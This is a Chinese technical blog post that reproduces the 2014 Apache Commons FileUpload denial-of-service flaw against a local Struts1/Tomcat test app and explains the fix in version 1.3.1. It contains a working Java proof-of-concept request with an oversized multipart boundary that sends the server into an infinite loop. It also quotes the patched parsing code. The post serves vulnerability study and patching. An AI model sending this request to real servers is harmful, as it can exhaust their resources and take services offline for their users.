重现apache commons fileupload DOS漏洞

最新推荐文章于 2024-01-30 13:57:06 发布
最新推荐文章于 2024-01-30 13:57:06 发布
阅读量4.3k 收藏 1
点赞数 3
分类专栏: Java基础 文章标签: fileupload DOS攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunxing007/article/details/25881271
版权
注:本文仅供技术探讨, 研究,测试使用。

这个漏洞是2014年2月4日被发现的, 因为该组件试用范围非常广, 所以该漏洞的影响也非常巨大。通过特制的包含畸形header的http请求,可以导致使用该组件的应用程序进入无限循环从而耗尽CPU等资源并最终崩溃。

最近因为在修补struts1的可操纵classLoader的漏洞(struts2也有该漏洞, 不在本文讨论范围), 所以我就在我建立的struts1的项目上直接做测试,怎么创建struts1的项目不在本文讨论范围之列你可以在这里下载struts1样例程序(http://download.csdn.net/detail/sunxing007/7350433)。 只需要建立一个最简单的hello world的struts1程序即可。然后启动tomcat并部署项目。

然后用apache http component 组件写一个程序来发起一个“带特制的包含畸形header的http请求” 关键代码如下(在下载的附件中有HttpUtil.java包含完整的代码):

public static void testCommonFileUploadVelnerability() throws ClientProtocolException, IOException{
	CloseableHttpClient httpClient = createHttpClient();
	HttpPost post = new HttpPost("http://localhost:8080/Struts1/helloWorld.do");
	String boundary = "";
	for(int i=0; i<4092; i++){
		boundary += "a";
	}
	post.setHeader("Content-Type", "multipart/form-data; boundary=#{" + boundary + "}");
	post.setHeader("lf-None-Match","59e532f501ac13174dd9c488f897ee75");
	String body = "";
	for(int i=0; i<4097; i++){
		body +="b";
	}
    post.setEntity(new StringEntity(body));
    
    CloseableHttpResponse response = httpClient.execute(post, DEFAULT_CONTEXT);
    HttpEntity entity = response.getEntity();
    System.out.println(EntityUtils.toString(entity));
    System.out.println("Over!");
}
运行该程序, 你会发现该程序无法返回, 打开任务管理器,会发现CPU使用率为100%; 关闭tomcat后 CPU的使用率马上降到正常水平。

该漏洞出现在fileupload 1.3和以前的版本, apache在漏洞发现之后很快发布了1.3.1版本修复了该bug。

稍微有点好奇的我,就下载了fileupload的1.3和1.3.1的源码并比较了一下, 发现问题的原因就在于, 它在解析/读取上传内容的时候,使用了一个长度为4096的buffer,它不断的读取内容到buffer并用boundary来判断是否一个附件结束。但是如果一个boundary加上CR/LF外加两个dash(-)的长度本身就超过了buffer的长度的话, 会导致解析进入死循环。所以apache在fix这个bug的时候,会判断boundary的长度是否大于buffer的长度。如果是就抛异常。如下的代码片段出现在FileUploadBase.java和MultipartStream.java中: 
try {
	multi = new MultipartStream(input, boundary, notifier);
} catch (IllegalArgumentException iae) {
	throw new InvalidContentTypeException(
			format("The boundary specified in the %s header is too long", CONTENT_TYPE), iae);
}

public MultipartStream(InputStream input,
		byte[] boundary,
		int bufSize,
		ProgressNotifier pNotifier) {

	if (boundary == null) {
		throw new IllegalArgumentException("boundary may not be null");
	}

	this.input = input;
	this.bufSize = bufSize;
	this.buffer = new byte[bufSize];
	this.notifier = pNotifier;

	// We prepend CR/LF to the boundary to chop trailing CR/LF from
	// body-data tokens.
	this.boundaryLength = boundary.length + BOUNDARY_PREFIX.length;
	if (bufSize < this.boundaryLength + 1) {
		throw new IllegalArgumentException(
				"The buffer size specified for the MultipartStream is too small");
	}
	this.boundary = new byte[this.boundaryLength];
	this.keepRegion = this.boundary.length;

	System.arraycopy(BOUNDARY_PREFIX, 0, this.boundary, 0,
			BOUNDARY_PREFIX.length);
	System.arraycopy(boundary, 0, this.boundary, BOUNDARY_PREFIX.length,
			boundary.length);

	head = 0;
	tail = 0;
}

有兴趣的可以下载源码并详细研究一下。

转载请注明来自: http://blog.csdn.net/sunxing007


sunxing007
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache commons fileupload文件上传实例讲解
09-01
Apache Commons FileUpload是Java处理文件上传的一个强大工具,它为Servlet和JSP应用程序提供了处理multipart/form-data请求的API。这种请求类型通常用于文件上传功能,因为它允许在表单包含多个部分,每部分...
基于apache commons.fileupload的文件上传组件,改进了上传速度
07-17
apache commons.fileupload上传组件在上传文件时,在调用parseRequest方法时,先将输入流上传到服务器临时目录,在之后的文件处理过程,再将临时目录下保存的文件复制到指定的目录,多了一道转储步骤。本实现抽取...
Commons-FileUpload的稳定性
纯月部落
04-22 1877
继续在使用这个控件,基本的小文件还是可以应付的,但是对于大型文件,其稳定性仍待考证!
可恶意操作文件的漏洞分析!
qq_36189144的博客
10-12 333
点击上方“阿拉奇学Java”,选择“置顶或者星标”优质文章第一时间送达!推荐阅读 |漏洞的来源是在于 DiskFileItem的 readObject()进行文件写...
Apache Commons FileUpload 拒绝服务漏洞(CVE-2023-24998)
weixin_45816407的博客
08-08 2504
接着点击WEB-INF文件夹下的lib文件夹将下载的jar包放入。直接修改webapp的解压后的war包文件。一直点击,点击pom.xml。
apache commons fileupload 安全漏洞(2016-07-01更新)
Jog熊吉的博客
07-22 5541
Apache Commons FileUpload安全漏洞 该页面列出所有Apache Commons FileUpload发行版修复的安全漏洞。每个安全漏斗都由开发团队给予安全影响等级——请注意该等级可能给予系统而变化。我们还列出Commons FileUpload版本已知漏洞的影响,以及各版本未证实漏洞会附带问号进行罗列。 请注意该页面未提供二进制文件补丁。如果你需要实施源码补丁,
Apache Commons fileUpload文件上传多个示例分享
09-01
主要为大家分享了Apache Commons fileUpload文件上传4个示例,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
Apache Commons fileUpload实现文件上传之一
09-02
在本案例,我们将探讨如何使用 Apache Commons FileUpload 实现文件上传功能。 首先,我们需要在项目包含两个关键的 JAR 包:`commons-fileupload.jar` 和 `commons-io.jar`。`commons-fileupload.jar` 提供了...
Apache Commons FileUpload jar
10-10
Apache Commons FileUpload jar Apache Commons FileUpload jar Apache Commons FileUpload jar
commons-fileupload-1.3.3.zip
05-14
Apache Struts2 Commons FileUpload反序列化远程代码执行漏洞安全公告 安全公告编号:CNTA-2018-0029 2018年11月7日,国家信息安全漏洞共享平台(CNVD)收录了Apache Struts2 Commons FileUpload反序列化远程代码执行漏洞(CNVD-2016-09997,对应CVE-2016-1000031)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,厂商已发布修复漏洞版本。 一、漏洞情况分析 Struts2是第二代基于Model-View-Controller(MVC)模型的java企业级web应用框架,成为国内外较为流行的容器软件间件。 2018年11月5日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(CVE-2016-1000031),该漏洞由Tenable研究团队发现。此漏洞FileUpload的一个高危漏洞,这个库作为Apache Struts 2的一部分,被用作文件上传的默认机制。攻击者可以在未经授权的情况下,执行任意代码并可获取目标系统的所有权限。 CNVD对该漏洞的综合评级为“高危”。 二、漏洞影响范围 目前,漏洞影响的产品版本包括: Struts 2.5.12以下版本。 三、漏洞处置建议 目前,Apache公司已发布了新版本(Struts 2.5.12及以上版本,包括Commons FileUpload库的修补版本1.3.3)修复了该漏洞
使用apache.commons.fileupload组件来进行文件上传
有毒的美丽
08-23 109
1. 从www.apache.org的common项目下搞到commons-fileupload.jar 和commons-io.jar,导入项目。 2. jsp页面,form的属性设置要求为: &lt;form action="uploadServlet" method="post" enctype="multipart/form-data"&gt; 其,post和multip...
什么是文件的上传漏洞?如何预防?
最新发布
2401_82595935的博客
01-30 1512
文件上传漏洞、web安全
小心Commons fileupload攻击[更新]
wei
12-12 225
1.这种攻击不会出现在BS的应用,因为要从web页面模拟攻击比较累。而CS程序则天生可能会隐藏这种问题。   2.经过认真的跟进,最终发现问题出在sizeThreshold 这个参数上。   让人费解的来由是: org.apache.commons.fileupload.FileUploadBase这个基类351行,解析request调用了   OutputStream os = ...
Apache Commons FileUpload
weixin_33819479的博客
11-08 359
Apache Commons FileUpload 和 Tomcat拒绝服务漏洞(CVE-2014-0050) 1 受影响主机 10.238.208.34 详细描述 Apache Commons FileUpload软件包可以向小服务程序和Web应用添加高性能的文件上传功能。 Apache Commons FileUpload ...
CVE-2022-42889 Apache Commons Text 漏洞
王嘟嘟的博客
02-28 941
所幸遇到,就简单看看,其没有啥比较难的地方,仅做记录。10月13日的漏洞
Apache Tomcat安全漏洞列表以及修补建议
Keep learing, and stay fast
08-31 3604
Apache Tomcat安全漏洞列表
【Tomcat】Tomcat多个版本存在拒绝服务漏洞
cnskylee的博客
02-22 6872
Apache Tomcat使用Apache Commons FileUpload的打包重命名副本 提供 Jakarta Servlet 定义的文件上传功能 规范。因此,Apache Tomcat也容易受到 Apache 共享资源文件上传漏洞。为 处理的请求部件数量没有限制。这 导致攻击者可能触发 DoS 恶意上传或一系列上传。拒绝服务漏洞DoS)2022年12月11日。
漏洞分析】Apache Commons Text远程代码执行漏洞(CVE-2022-42889)
olga5abl的博客
11-30 4279
这些查找是:-“script”-使用JVM脚本执行引擎(javax.script)执行表达式-“dns”-解析dns记录-“url”-从url加载值,如果使用不受信任的配置值,则受影响版本使用插值默认值的应用程序,可能容易受到远程代码执行或与远程服务器无意接触的影响。并且这种插值器的性质意味着,将内容输入到易受攻击的对象的可能性,比仅与Log4Shell的此类字符串交互的可能性要小。通常在开发过程用于占位符和动态获取属性的字符串编辑工具包,常用于数据库查询前的语句替换,或者页面输出时的替换。
Apache Commons FileUpload在maven的依赖是什么
06-09
Apache Commons FileUpload在Maven的依赖如下: ```xml <groupId>commons-fileupload <artifactId>commons-fileupload <version>1.4 ``` 在pom.xml文件添加上述依赖即可。需要注意的是,版本号可以根据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值